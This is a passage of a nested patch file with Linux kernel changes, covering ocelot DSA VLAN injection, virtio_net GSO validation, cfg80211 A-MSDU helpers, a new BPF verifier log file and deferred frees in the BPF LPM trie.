+ #define _NET_DSA_TAG_OCELOT_H
+ 
++#include <linux/if_bridge.h>
++#include <linux/if_vlan.h>
+ #include <linux/kthread.h>
+ #include <linux/packing.h>
+ #include <linux/skbuff.h>
+@@ -273,4 +275,49 @@ static inline u32 ocelot_ptp_rew_op(struct sk_buff *skb)
+ 	return rew_op;
+ }
+ 
++/**
++ * ocelot_xmit_get_vlan_info - Determine VLAN_TCI and TAG_TYPE for injected frame
++ * @skb: Pointer to socket buffer
++ * @br: Pointer to bridge device that the port is under, if any
++ * @vlan_tci: Pointer to return the VLAN TCI for the injection header
++ * @tag_type: Pointer to return the tag type (IFH_TAG_TYPE_C or IFH_TAG_TYPE_S)
++ *
++ * If the port is under a VLAN-aware bridge, remove the VLAN header from the
++ * payload and move it into the DSA tag, which will make the switch classify
++ * the packet to the bridge VLAN. Otherwise, leave the classified VLAN at zero,
++ * which is the pvid of standalone ports (OCELOT_STANDALONE_PVID), although not
++ * of VLAN-unaware bridge ports (that would be ocelot_vlan_unaware_pvid()).
++ * Anyway, VID 0 is fine because it is stripped on egress for these port modes,
++ * and source address learning is not performed for packets injected from the
++ * CPU anyway, so it doesn't matter that the VID is "wrong".
++ */
++static inline void ocelot_xmit_get_vlan_info(struct sk_buff *skb,
++					     struct net_device *br,
++					     u64 *vlan_tci, u64 *tag_type)
++{
++	struct vlan_ethhdr *hdr;
++	u16 proto, tci;
++
++	if (!br || !br_vlan_enabled(br)) {
++		*vlan_tci = 0;
++		*tag_type = IFH_TAG_TYPE_C;
++		return;
++	}
++
++	hdr = (struct vlan_ethhdr *)skb_mac_header(skb);
++	br_vlan_get_proto(br, &proto);
++
++	if (ntohs(hdr->h_vlan_proto) == proto) {
++		vlan_remove_tag(skb, &tci);
++		*vlan_tci = tci;
++	} else {
++		rcu_read_lock();
++		br_vlan_get_pvid_rcu(br, &tci);
++		rcu_read_unlock();
++		*vlan_tci = tci;
++	}
++
++	*tag_type = (proto != ETH_P_8021Q) ? IFH_TAG_TYPE_S : IFH_TAG_TYPE_C;
++}
++
+ #endif
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index 092d8fa10153f..f2206c78755aa 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -2507,6 +2507,9 @@ static inline void kiocb_clone(struct kiocb *kiocb, struct kiocb *kiocb_src,
+  *
+  * I_PINNING_FSCACHE_WB	Inode is pinning an fscache object for writeback.
+  *
++ * I_LRU_ISOLATING	Inode is pinned while being isolated from the LRU,
++ *			without holding i_count.
++ *
+  * Q: What is the difference between I_WILL_FREE and I_FREEING?
+  */
+ #define I_DIRTY_SYNC		(1 << 0)
+@@ -2530,6 +2533,8 @@ static inline void kiocb_clone(struct kiocb *kiocb, struct kiocb *kiocb_src,
+ #define I_DONTCACHE		(1 << 16)
+ #define I_SYNC_QUEUED		(1 << 17)
+ #define I_PINNING_FSCACHE_WB	(1 << 18)
++#define __I_LRU_ISOLATING	19
++#define I_LRU_ISOLATING		(1 << __I_LRU_ISOLATING)
+ 
+ #define I_DIRTY_INODE (I_DIRTY_SYNC | I_DIRTY_DATASYNC)
+ #define I_DIRTY (I_DIRTY_INODE | I_DIRTY_PAGES)
+diff --git a/include/linux/if_vlan.h b/include/linux/if_vlan.h
+index e0d0a645be7cf..83266201746c1 100644
+--- a/include/linux/if_vlan.h
++++ b/include/linux/if_vlan.h
+@@ -704,6 +704,27 @@ static inline void vlan_set_encap_proto(struct sk_buff *skb,
+ 		skb->protocol = htons(ETH_P_802_2);
+ }
+ 
++/**
++ * vlan_remove_tag - remove outer VLAN tag from payload
++ * @skb: skbuff to remove tag from
++ * @vlan_tci: buffer to store the extracted VLAN TCI
++ *
++ * Expects the skb to contain a VLAN tag in the payload, and to have skb->data
++ * pointing at the MAC header.
++ *
++ * Returns a new pointer to skb->data, or NULL on failure to pull.
++ */
++static inline void *vlan_remove_tag(struct sk_buff *skb, u16 *vlan_tci)
++{
++	struct vlan_hdr *vhdr = (struct vlan_hdr *)(skb->data + ETH_HLEN);
++
++	*vlan_tci = ntohs(vhdr->h_vlan_TCI);
++
++	memmove(skb->data + VLAN_HLEN, skb->data, 2 * ETH_ALEN);
++	vlan_set_encap_proto(skb, vhdr);
++	return __skb_pull(skb, VLAN_HLEN);
++}
++
+ /**
+  * skb_vlan_tagged - check if skb is vlan tagged.
+  * @skb: skbuff to query
+diff --git a/include/linux/jbd2.h b/include/linux/jbd2.h
+index e301d323108d1..5bf7ada754d79 100644
+--- a/include/linux/jbd2.h
++++ b/include/linux/jbd2.h
+@@ -1302,6 +1302,14 @@ struct journal_s
+ 				    struct buffer_head *bh,
+ 				    enum passtype pass, int off,
+ 				    tid_t expected_commit_id);
++
++	/**
++	 * @j_bmap:
++	 *
++	 * Bmap function that should be used instead of the generic
++	 * VFS bmap function.
++	 */
++	int (*j_bmap)(struct journal_s *journal, sector_t *block);
+ };
+ 
+ #define jbd2_might_wait_for_commit(j) \
+diff --git a/include/linux/pid.h b/include/linux/pid.h
+index 343abf22092e6..bf3af54de6165 100644
+--- a/include/linux/pid.h
++++ b/include/linux/pid.h
+@@ -67,7 +67,7 @@ struct pid
+ 	/* wait queue for pidfd notifications */
+ 	wait_queue_head_t wait_pidfd;
+ 	struct rcu_head rcu;
+-	struct upid numbers[1];
++	struct upid numbers[];
+ };
+ 
+ extern struct pid init_struct_pid;
+diff --git a/include/linux/sched/signal.h b/include/linux/sched/signal.h
+index 20099268fa257..669e8cff40c74 100644
+--- a/include/linux/sched/signal.h
++++ b/include/linux/sched/signal.h
+@@ -135,7 +135,7 @@ struct signal_struct {
+ #ifdef CONFIG_POSIX_TIMERS
+ 
+ 	/* POSIX.1b Interval Timers */
+-	int			posix_timer_id;
++	unsigned int		next_posix_timer_id;
+ 	struct list_head	posix_timers;
+ 
+ 	/* ITIMER_REAL timer for the process */
+diff --git a/include/linux/slab.h b/include/linux/slab.h
+index b8e77ffc38929..64cb4e26c8a6b 100644
+--- a/include/linux/slab.h
++++ b/include/linux/slab.h
+@@ -215,8 +215,9 @@ DEFINE_FREE(kfree, void *, if (!IS_ERR_OR_NULL(_T)) kfree(_T))
+ size_t ksize(const void *objp);
+ 
+ #ifdef CONFIG_PRINTK
+-bool kmem_valid_obj(void *object);
+-void kmem_dump_obj(void *object);
++bool kmem_dump_obj(void *object);
++#else
++static inline bool kmem_dump_obj(void *object) { return false; }
+ #endif
+ 
+ /*
+diff --git a/include/linux/sunrpc/svc.h b/include/linux/sunrpc/svc.h
+index 912da376ef9bf..49621cc4e01bd 100644
+--- a/include/linux/sunrpc/svc.h
++++ b/include/linux/sunrpc/svc.h
+@@ -123,19 +123,6 @@ static inline void svc_put(struct svc_serv *serv)
+ 	kref_put(&serv->sv_refcnt, svc_destroy);
+ }
+ 
+-/**
+- * svc_put_not_last - decrement non-final reference count on SUNRPC serv
+- * @serv:  the svc_serv to have count decremented
+- *
+- * Returns: %true is refcount was decremented.
+- *
+- * If the refcount is 1, it is not decremented and instead failure is reported.
+- */
+-static inline bool svc_put_not_last(struct svc_serv *serv)
+-{
+-	return refcount_dec_not_one(&serv->sv_refcnt.refcount);
+-}
+-
+ /*
+  * Maximum payload size supported by a kernel RPC server.
+  * This is use to determine the max number of pages nfsd is
+diff --git a/include/linux/udp.h b/include/linux/udp.h
+index 79a4eae6f1f8f..e0bbc05f001a4 100644
+--- a/include/linux/udp.h
++++ b/include/linux/udp.h
+@@ -102,7 +102,7 @@ struct udp_sock {
+ #define udp_assign_bit(nr, sk, val)		\
+ 	assign_bit(UDP_FLAGS_##nr, &udp_sk(sk)->udp_flags, val)
+ 
+-#define UDP_MAX_SEGMENTS	(1 << 6UL)
++#define UDP_MAX_SEGMENTS	(1 << 7UL)
+ 
+ static inline struct udp_sock *udp_sk(const struct sock *sk)
+ {
+diff --git a/include/linux/virtio_net.h b/include/linux/virtio_net.h
+index 29b19d0a324c7..823e28042f410 100644
+--- a/include/linux/virtio_net.h
++++ b/include/linux/virtio_net.h
+@@ -3,8 +3,8 @@
+ #define _LINUX_VIRTIO_NET_H
+ 
+ #include <linux/if_vlan.h>
++#include <linux/udp.h>
+ #include <uapi/linux/tcp.h>
+-#include <uapi/linux/udp.h>
+ #include <uapi/linux/virtio_net.h>
+ 
+ static inline bool virtio_net_hdr_match_proto(__be16 protocol, __u8 gso_type)
+@@ -51,7 +51,6 @@ static inline int virtio_net_hdr_to_skb(struct sk_buff *skb,
+ 	unsigned int thlen = 0;
+ 	unsigned int p_off = 0;
+ 	unsigned int ip_proto;
+-	u64 ret, remainder, gso_size;
+ 
+ 	if (hdr->gso_type != VIRTIO_NET_HDR_GSO_NONE) {
+ 		switch (hdr->gso_type & ~VIRTIO_NET_HDR_GSO_ECN) {
+@@ -88,16 +87,6 @@ static inline int virtio_net_hdr_to_skb(struct sk_buff *skb,
+ 		u32 off = __virtio16_to_cpu(little_endian, hdr->csum_offset);
+ 		u32 needed = start + max_t(u32, thlen, off + sizeof(__sum16));
+ 
+-		if (hdr->gso_size) {
+-			gso_size = __virtio16_to_cpu(little_endian, hdr->gso_size);
+-			ret = div64_u64_rem(skb->len, gso_size, &remainder);
+-			if (!(ret && (hdr->gso_size > needed) &&
+-						((remainder > needed) || (remainder == 0)))) {
+-				return -EINVAL;
+-			}
+-			skb_shinfo(skb)->tx_flags |= SKBFL_SHARED_FRAG;
+-		}
+-
+ 		if (!pskb_may_pull(skb, needed))
+ 			return -EINVAL;
+ 
+@@ -155,9 +144,27 @@ static inline int virtio_net_hdr_to_skb(struct sk_buff *skb,
+ 		unsigned int nh_off = p_off;
+ 		struct skb_shared_info *shinfo = skb_shinfo(skb);
+ 
+-		/* UFO may not include transport header in gso_size. */
+-		if (gso_type & SKB_GSO_UDP)
++		switch (gso_type & ~SKB_GSO_TCP_ECN) {
++		case SKB_GSO_UDP:
++			/* UFO may not include transport header in gso_size. */
+ 			nh_off -= thlen;
++			break;
++		case SKB_GSO_UDP_L4:
++			if (!(hdr->flags & VIRTIO_NET_HDR_F_NEEDS_CSUM))
++				return -EINVAL;
++			if (skb->csum_offset != offsetof(struct udphdr, check))
++				return -EINVAL;
++			if (skb->len - p_off > gso_size * UDP_MAX_SEGMENTS)
++				return -EINVAL;
++			if (gso_type != SKB_GSO_UDP_L4)
++				return -EINVAL;
++			break;
++		case SKB_GSO_TCPV4:
++		case SKB_GSO_TCPV6:
++			if (skb->csum_offset != offsetof(struct tcphdr, check))
++				return -EINVAL;
++			break;
++		}
+ 
+ 		/* Kernel has a special handling for GSO_BY_FRAGS. */
+ 		if (gso_size == GSO_BY_FRAGS)
+diff --git a/include/net/cfg80211.h b/include/net/cfg80211.h
+index 5bf5c1ab542ce..2a0fc4a64af1e 100644
+--- a/include/net/cfg80211.h
++++ b/include/net/cfg80211.h
+@@ -6301,6 +6301,19 @@ static inline int ieee80211_data_to_8023(struct sk_buff *skb, const u8 *addr,
+ 	return ieee80211_data_to_8023_exthdr(skb, NULL, addr, iftype, 0, false);
+ }
+ 
++/**
++ * ieee80211_is_valid_amsdu - check if subframe lengths of an A-MSDU are valid
++ *
++ * This is used to detect non-standard A-MSDU frames, e.g. the ones generated
++ * by ath10k and ath11k, where the subframe length includes the length of the
++ * mesh control field.
++ *
++ * @skb: The input A-MSDU frame without any headers.
++ * @mesh_hdr: use standards-compliant mesh A-MSDU subframe header
++ * Returns: true if subframe header lengths are valid for the @mesh_hdr mode
++ */
++bool ieee80211_is_valid_amsdu(struct sk_buff *skb, bool mesh_hdr);
++
+ /**
+  * ieee80211_amsdu_to_8023s - decode an IEEE 802.11n A-MSDU frame
+  *
+@@ -6316,11 +6329,36 @@ static inline int ieee80211_data_to_8023(struct sk_buff *skb, const u8 *addr,
+  * @extra_headroom: The hardware extra headroom for SKBs in the @list.
+  * @check_da: DA to check in the inner ethernet header, or NULL
+  * @check_sa: SA to check in the inner ethernet header, or NULL
++ * @mesh_control: A-MSDU subframe header includes the mesh control field
+  */
+ void ieee80211_amsdu_to_8023s(struct sk_buff *skb, struct sk_buff_head *list,
+ 			      const u8 *addr, enum nl80211_iftype iftype,
+ 			      const unsigned int extra_headroom,
+-			      const u8 *check_da, const u8 *check_sa);
++			      const u8 *check_da, const u8 *check_sa,
++			      bool mesh_control);
++
++/**
++ * ieee80211_get_8023_tunnel_proto - get RFC1042 or bridge tunnel encap protocol
++ *
++ * Check for RFC1042 or bridge tunnel header and fetch the encapsulated
++ * protocol.
++ *
++ * @hdr: pointer to the MSDU payload
++ * @proto: destination pointer to store the protocol
++ * Return: true if encapsulation was found
++ */
++bool ieee80211_get_8023_tunnel_proto(const void *hdr, __be16 *proto);
++
++/**
++ * ieee80211_strip_8023_mesh_hdr - strip mesh header from converted 802.3 frames
++ *
++ * Strip the mesh header, which was left in by ieee80211_data_to_8023 as part
++ * of the MSDU data. Also move any source/destination addresses from the mesh
++ * header to the ethernet header (if present).
++ *
++ * @skb: The 802.3 frame with embedded mesh header
++ */
++int ieee80211_strip_8023_mesh_hdr(struct sk_buff *skb);
+ 
+ /**
+  * cfg80211_classify8021d - determine the 802.1p/1d tag for a data frame
+diff --git a/include/net/inet_timewait_sock.h b/include/net/inet_timewait_sock.h
+index 4a8e578405cb3..9365e5af8d6da 100644
+--- a/include/net/inet_timewait_sock.h
++++ b/include/net/inet_timewait_sock.h
+@@ -114,7 +114,7 @@ static inline void inet_twsk_reschedule(struct inet_timewait_sock *tw, int timeo
+ 
+ void inet_twsk_deschedule_put(struct inet_timewait_sock *tw);
+ 
+-void inet_twsk_purge(struct inet_hashinfo *hashinfo, int family);
++void inet_twsk_purge(struct inet_hashinfo *hashinfo);
+ 
+ static inline
+ struct net *twsk_net(const struct inet_timewait_sock *twsk)
+diff --git a/include/net/kcm.h b/include/net/kcm.h
+index 2d704f8f49059..8e8252e08a9ce 100644
+--- a/include/net/kcm.h
++++ b/include/net/kcm.h
+@@ -70,6 +70,7 @@ struct kcm_sock {
+ 	struct work_struct tx_work;
+ 	struct list_head wait_psock_list;
+ 	struct sk_buff *seq_skb;
++	struct mutex tx_mutex;
+ 	u32 tx_stopped : 1;
+ 
+ 	/* Don't use bit fields here, these are set under different locks */
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index cc314c383c532..c7501ca66dd34 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -352,7 +352,7 @@ void tcp_rcv_established(struct sock *sk, struct sk_buff *skb);
+ void tcp_rcv_space_adjust(struct sock *sk);
+ int tcp_twsk_unique(struct sock *sk, struct sock *sktw, void *twp);
+ void tcp_twsk_destructor(struct sock *sk);
+-void tcp_twsk_purge(struct list_head *net_exit_list, int family);
++void tcp_twsk_purge(struct list_head *net_exit_list);
+ ssize_t tcp_splice_read(struct socket *sk, loff_t *ppos,
+ 			struct pipe_inode_info *pipe, size_t len,
+ 			unsigned int flags);
+diff --git a/include/scsi/scsi_cmnd.h b/include/scsi/scsi_cmnd.h
+index 7d3622db38edc..3a92245fd845d 100644
+--- a/include/scsi/scsi_cmnd.h
++++ b/include/scsi/scsi_cmnd.h
+@@ -228,7 +228,7 @@ static inline sector_t scsi_get_lba(struct scsi_cmnd *scmd)
+ 
+ static inline unsigned int scsi_logical_block_count(struct scsi_cmnd *scmd)
+ {
+-	unsigned int shift = ilog2(scmd->device->sector_size) - SECTOR_SHIFT;
++	unsigned int shift = ilog2(scmd->device->sector_size);
+ 
+ 	return blk_rq_bytes(scsi_cmd_to_rq(scmd)) >> shift;
+ }
+diff --git a/include/soc/mscc/ocelot.h b/include/soc/mscc/ocelot.h
+index 195ca8f0b6f9d..9b5562f545486 100644
+--- a/include/soc/mscc/ocelot.h
++++ b/include/soc/mscc/ocelot.h
+@@ -977,6 +977,9 @@ struct ocelot {
+ 	const struct ocelot_stat_layout	*stats_layout;
+ 	struct list_head		stats_regions;
+ 
++	spinlock_t			inj_lock;
++	spinlock_t			xtr_lock;
++
+ 	u32				pool_size[OCELOT_SB_NUM][OCELOT_SB_POOL_NUM];
+ 	int				packet_buffer_size;
+ 	int				num_frame_refs;
+@@ -1125,10 +1128,17 @@ void __ocelot_target_write_ix(struct ocelot *ocelot, enum ocelot_target target,
+ 			      u32 val, u32 reg, u32 offset);
+ 
+ /* Packet I/O */
++void ocelot_lock_inj_grp(struct ocelot *ocelot, int grp);
++void ocelot_unlock_inj_grp(struct ocelot *ocelot, int grp);
++void ocelot_lock_xtr_grp(struct ocelot *ocelot, int grp);
++void ocelot_unlock_xtr_grp(struct ocelot *ocelot, int grp);
++void ocelot_lock_xtr_grp_bh(struct ocelot *ocelot, int grp);
++void ocelot_unlock_xtr_grp_bh(struct ocelot *ocelot, int grp);
+ bool ocelot_can_inject(struct ocelot *ocelot, int grp);
+ void ocelot_port_inject_frame(struct ocelot *ocelot, int port, int grp,
+ 			      u32 rew_op, struct sk_buff *skb);
+-void ocelot_ifh_port_set(void *ifh, int port, u32 rew_op, u32 vlan_tag);
++void ocelot_ifh_set_basic(void *ifh, struct ocelot *ocelot, int port,
++			  u32 rew_op, struct sk_buff *skb);
+ int ocelot_xtr_poll_frame(struct ocelot *ocelot, int grp, struct sk_buff **skb);
+ void ocelot_drain_cpu_queue(struct ocelot *ocelot, int grp);
+ void ocelot_ptp_rx_timestamp(struct ocelot *ocelot, struct sk_buff *skb,
+diff --git a/include/trace/events/huge_memory.h b/include/trace/events/huge_memory.h
+index 760455dfa8600..01591e7995235 100644
+--- a/include/trace/events/huge_memory.h
++++ b/include/trace/events/huge_memory.h
+@@ -36,7 +36,8 @@
+ 	EM( SCAN_ALLOC_HUGE_PAGE_FAIL,	"alloc_huge_page_failed")	\
+ 	EM( SCAN_CGROUP_CHARGE_FAIL,	"ccgroup_charge_failed")	\
+ 	EM( SCAN_TRUNCATED,		"truncated")			\
+-	EMe(SCAN_PAGE_HAS_PRIVATE,	"page_has_private")		\
++	EM( SCAN_PAGE_HAS_PRIVATE,	"page_has_private")		\
++	EMe(SCAN_STORE_FAILED,		"store_failed")
+ 
+ #undef EM
+ #undef EMe
+diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
+index a17688011440e..58c7fc75da752 100644
+--- a/include/uapi/linux/bpf.h
++++ b/include/uapi/linux/bpf.h
+@@ -76,12 +76,29 @@ struct bpf_insn {
+ 	__s32	imm;		/* signed immediate constant */
+ };
+ 
+-/* Key of an a BPF_MAP_TYPE_LPM_TRIE entry */
++/* Deprecated: use struct bpf_lpm_trie_key_u8 (when the "data" member is needed for
++ * byte access) or struct bpf_lpm_trie_key_hdr (when using an alternative type for
++ * the trailing flexible array member) instead.
++ */
+ struct bpf_lpm_trie_key {
+ 	__u32	prefixlen;	/* up to 32 for AF_INET, 128 for AF_INET6 */
+ 	__u8	data[0];	/* Arbitrary size */
+ };
+ 
++/* Header for bpf_lpm_trie_key structs */
++struct bpf_lpm_trie_key_hdr {
++	__u32	prefixlen;
++};
++
++/* Key of a BPF_MAP_TYPE_LPM_TRIE entry, with trailing byte array. */
++struct bpf_lpm_trie_key_u8 {
++	union {
++		struct bpf_lpm_trie_key_hdr	hdr;
++		__u32				prefixlen;
++	};
++	__u8	data[];		/* Arbitrary size */
++};
++
+ struct bpf_cgroup_storage_key {
+ 	__u64	cgroup_inode_id;	/* cgroup inode id */
+ 	__u32	attach_type;		/* program attach type (enum bpf_attach_type) */
+diff --git a/init/Kconfig b/init/Kconfig
+index 4cd3fc82b09e5..2825c8cfde3b5 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -1942,12 +1942,15 @@ config RUST
+ config RUSTC_VERSION_TEXT
+ 	string
+ 	depends on RUST
+-	default $(shell,command -v $(RUSTC) >/dev/null 2>&1 && $(RUSTC) --version || echo n)
++	default "$(shell,$(RUSTC) --version 2>/dev/null)"
+ 
+ config BINDGEN_VERSION_TEXT
+ 	string
+ 	depends on RUST
+-	default $(shell,command -v $(BINDGEN) >/dev/null 2>&1 && $(BINDGEN) --version || echo n)
++	# The dummy parameter `workaround-for-0.69.0` is required to support 0.69.0
++	# (https://github.com/rust-lang/rust-bindgen/pull/2678). It can be removed when
++	# the minimum version is upgraded past that (0.69.1 already fixed the issue).
++	default "$(shell,$(BINDGEN) --version workaround-for-0.69.0 2>/dev/null)"
+ 
+ #
+ # Place an empty function call at each tracepoint site. Can be
+diff --git a/kernel/bpf/Makefile b/kernel/bpf/Makefile
+index 341c94f208f4c..5b86ea9f09c46 100644
+--- a/kernel/bpf/Makefile
++++ b/kernel/bpf/Makefile
+@@ -6,7 +6,8 @@ cflags-nogcse-$(CONFIG_X86)$(CONFIG_CC_IS_GCC) := -fno-gcse
+ endif
+ CFLAGS_core.o += $(call cc-disable-warning, override-init) $(cflags-nogcse-yy)
+ 
+-obj-$(CONFIG_BPF_SYSCALL) += syscall.o verifier.o inode.o helpers.o tnum.o bpf_iter.o map_iter.o task_iter.o prog_iter.o link_iter.o
++obj-$(CONFIG_BPF_SYSCALL) += syscall.o verifier.o inode.o helpers.o tnum.o log.o
++obj-$(CONFIG_BPF_SYSCALL) += bpf_iter.o map_iter.o task_iter.o prog_iter.o link_iter.o
+ obj-$(CONFIG_BPF_SYSCALL) += hashtab.o arraymap.o percpu_freelist.o bpf_lru_list.o lpm_trie.o map_in_map.o bloom_filter.o
+ obj-$(CONFIG_BPF_SYSCALL) += local_storage.o queue_stack_maps.o ringbuf.o
+ obj-$(CONFIG_BPF_SYSCALL) += bpf_local_storage.o bpf_task_storage.o
+diff --git a/kernel/bpf/log.c b/kernel/bpf/log.c
+new file mode 100644
+index 0000000000000..cd1b7113fbfd0
+--- /dev/null
++++ b/kernel/bpf/log.c
+@@ -0,0 +1,82 @@
++// SPDX-License-Identifier: GPL-2.0-only
++/* Copyright (c) 2011-2014 PLUMgrid, http://plumgrid.com
++ * Copyright (c) 2016 Facebook
++ * Copyright (c) 2018 Covalent IO, Inc. http://covalent.io
++ */
++#include <uapi/linux/btf.h>
++#include <linux/kernel.h>
++#include <linux/types.h>
++#include <linux/bpf.h>
++#include <linux/bpf_verifier.h>
++
++bool bpf_verifier_log_attr_valid(const struct bpf_verifier_log *log)
++{
++	return log->len_total >= 128 && log->len_total <= UINT_MAX >> 2 &&
++	       log->level && log->ubuf && !(log->level & ~BPF_LOG_MASK);
++}
++
++void bpf_verifier_vlog(struct bpf_verifier_log *log, const char *fmt,
++		       va_list args)
++{
++	unsigned int n;
++
++	n = vscnprintf(log->kbuf, BPF_VERIFIER_TMP_LOG_SIZE, fmt, args);
++
++	if (log->level == BPF_LOG_KERNEL) {
++		bool newline = n > 0 && log->kbuf[n - 1] == '\n';
++
++		pr_err("BPF: %s%s", log->kbuf, newline ? "" : "\n");
++		return;
++	}
++
++	n = min(log->len_total - log->len_used - 1, n);
++	log->kbuf[n] = '\0';
++	if (!copy_to_user(log->ubuf + log->len_used, log->kbuf, n + 1))
++		log->len_used += n;
++	else
++		log->ubuf = NULL;
++}
++
++void bpf_vlog_reset(struct bpf_verifier_log *log, u32 new_pos)
++{
++	char zero = 0;
++
++	if (!bpf_verifier_log_needed(log))
++		return;
++
++	log->len_used = new_pos;
++	if (put_user(zero, log->ubuf + new_pos))
++		log->ubuf = NULL;
++}
++
++/* log_level controls verbosity level of eBPF verifier.
++ * bpf_verifier_log_write() is used to dump the verification trace to the log,
++ * so the user can figure out what's wrong with the program
++ */
++__printf(2, 3) void bpf_verifier_log_write(struct bpf_verifier_env *env,
++					   const char *fmt, ...)
++{
++	va_list args;
++
++	if (!bpf_verifier_log_needed(&env->log))
++		return;
++
++	va_start(args, fmt);
++	bpf_verifier_vlog(&env->log, fmt, args);
++	va_end(args);
++}
++EXPORT_SYMBOL_GPL(bpf_verifier_log_write);
++
++__printf(2, 3) void bpf_log(struct bpf_verifier_log *log,
++			    const char *fmt, ...)
++{
++	va_list args;
++
++	if (!bpf_verifier_log_needed(log))
++		return;
++
++	va_start(args, fmt);
++	bpf_verifier_vlog(log, fmt, args);
++	va_end(args);
++}
++EXPORT_SYMBOL_GPL(bpf_log);
+diff --git a/kernel/bpf/lpm_trie.c b/kernel/bpf/lpm_trie.c
+index ce3a091d52e89..37b510d91b810 100644
+--- a/kernel/bpf/lpm_trie.c
++++ b/kernel/bpf/lpm_trie.c
+@@ -164,13 +164,13 @@ static inline int extract_bit(const u8 *data, size_t index)
+  */
+ static size_t longest_prefix_match(const struct lpm_trie *trie,
+ 				   const struct lpm_trie_node *node,
+-				   const struct bpf_lpm_trie_key *key)
++				   const struct bpf_lpm_trie_key_u8 *key)
+ {
+ 	u32 limit = min(node->prefixlen, key->prefixlen);
+ 	u32 prefixlen = 0, i = 0;
+ 
+ 	BUILD_BUG_ON(offsetof(struct lpm_trie_node, data) % sizeof(u32));
+-	BUILD_BUG_ON(offsetof(struct bpf_lpm_trie_key, data) % sizeof(u32));
++	BUILD_BUG_ON(offsetof(struct bpf_lpm_trie_key_u8, data) % sizeof(u32));
+ 
+ #if defined(CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS) && defined(CONFIG_64BIT)
+ 
+@@ -229,7 +229,7 @@ static void *trie_lookup_elem(struct bpf_map *map, void *_key)
+ {
+ 	struct lpm_trie *trie = container_of(map, struct lpm_trie, map);
+ 	struct lpm_trie_node *node, *found = NULL;
+-	struct bpf_lpm_trie_key *key = _key;
++	struct bpf_lpm_trie_key_u8 *key = _key;
+ 
+ 	if (key->prefixlen > trie->max_prefixlen)
+ 		return NULL;
+@@ -308,8 +308,9 @@ static int trie_update_elem(struct bpf_map *map,
+ {
+ 	struct lpm_trie *trie = container_of(map, struct lpm_trie, map);
+ 	struct lpm_trie_node *node, *im_node = NULL, *new_node = NULL;
++	struct lpm_trie_node *free_node = NULL;
+ 	struct lpm_trie_node __rcu **slot;
+-	struct bpf_lpm_trie_key *key = _key;
++	struct bpf_lpm_trie_key_u8 *key = _key;
+ 	unsigned long irq_flags;
+ 	unsigned int next_bit;
+ 	size_t matchlen = 0;
+@@ -382,7 +383,7 @@ static int trie_update_elem(struct bpf_map *map,
+ 			trie->n_entries--;
+ 
+ 		rcu_assign_pointer(*slot, new_node);
+-		kfree_rcu(node, rcu);
++		free_node = node;
+ 
+ 		goto out;
+ 	}
+@@ -429,6 +430,7 @@ static int trie_update_elem(struct bpf_map *map,
+ 	}
+ 
+ 	spin_unlock_irqrestore(&trie->lock, irq_flags);
++	kfree_rcu(free_node, rcu);
+ 
+ 	return ret;
+ }
+@@ -437,7 +439,8 @@ static int trie_update_elem(struct bpf_map *map,
+ static int trie_delete_elem(struct bpf_map *map, void *_key)
+ {
+ 	struct lpm_trie *trie = container_of(map, struct lpm_trie, map);
+-	struct bpf_lpm_trie_key *key = _key;
++	struct lpm_trie_node *free_node = NULL, *free_parent = NULL;
++	struct bpf_lpm_trie_key_u8 *key = _key;
+ 	struct lpm_trie_node __rcu **trim, **trim2;
+ 	struct lpm_trie_node *node, *parent;
+ 	unsigned long irq_flags;
+@@ -506,8 +509,8 @@ static int trie_delete_elem(struct bpf_map *map, void *_key)
+ 		else
+ 			rcu_assign_pointer(
+ 				*trim2, rcu_access_pointer(parent->child[0]));
+-		kfree_rcu(parent, rcu);
+-		kfree_rcu(node, rcu);
++		free_parent = parent;
++		free_node = node;
+ 		goto out;
+ 	}
+ 
+@@ -521,10 +524,12 @@ static int trie_delete_elem(struct bpf_map *map, void *_key)
+ 		rcu_assign_pointer(*trim, rcu_access_pointer(node->child[1]));
+ 	else
+ 		RCU_INIT_POINTER(*trim, NULL);
+-	kfree_rcu(node, rcu);
++	free_node = node;
+ 
+ out:
+ 	spin_unlock_irqrestore(&trie->lock, irq_flags);
++	kfree_rcu(free_parent, rcu);
++	kfree_rcu(free_node, rcu);
+ 
+ 	return ret;
+ }
+@@ -536,7 +541,7 @@ static int trie_delete_elem(struct bpf_map *map, void *_key)
+ 				 sizeof(struct lpm_trie_node))
+ #define LPM_VAL_SIZE_MIN	1
+ 
+-#define LPM_KEY_SIZE(X)		(sizeof(struct bpf_lpm_trie_key) + (X))
++#define LPM_KEY_SIZE(X)		(sizeof(struct bpf_lpm_trie_key_u8) + (X))
+ #define LPM_KEY_SIZE_MAX	LPM_KEY_SIZE(LPM_DATA_SIZE_MAX)
+ #define LPM_KEY_SIZE_MIN	LPM_KEY_SIZE(LPM_DATA_SIZE_MIN)
+ 
+@@ -568,7 +573,7 @@ static struct bpf_map *trie_alloc(union bpf_attr *attr)
+ 	/* copy mandatory map attributes */
+ 	bpf_map_init_from_attr(&trie->map, attr);
+ 	trie->data_size = attr->key_size -
+-			  offsetof(struct bpf_lpm_trie_key, data);
++			  offsetof(struct bpf_lpm_trie_key_u8, data);
+ 	trie->max_prefixlen = trie->data_size * 8;
+ 
+ 	spin_lock_init(&trie->lock);
+@@ -619,7 +624,7 @@ static int trie_get_next_key(struct bpf_map *map, void *_key, void *_next_key)
+ {
+ 	struct lpm_trie_node *node, *next_node = NULL, *parent, *search_root;
+ 	struct lpm_trie *trie = container_of(map, struct lpm_trie, map);
+-	struct bpf_lpm_trie_key *key = _key, *next_key = _next_key;
++	struct bpf_lpm_trie_key_u8 *key = _key, *next_key = _next_key;
+ 	struct lpm_trie_node **node_stack = NULL;
+ 	int err = 0, stack_ptr = -1;
+ 	unsigned int next_bit;
+@@ -706,7 +711,7 @@ static int trie_get_next_key(struct bpf_map *map, void *_key, void *_next_key)
+ 	}
+ do_copy:
+ 	next_key->prefixlen = next_node->prefixlen;
+-	memcpy((void *)next_key + offsetof(struct bpf_lpm_trie_key, data),
++	memcpy((void *)next_key + offsetof(struct bpf_lpm_trie_key_u8, data),
+ 	       next_node->data, trie->data_size);
+ free_stack:
+ 	kfree(node_stack);
+@@ -718,7 +723,7 @@ static int trie_check_btf(const struct bpf_map *map,
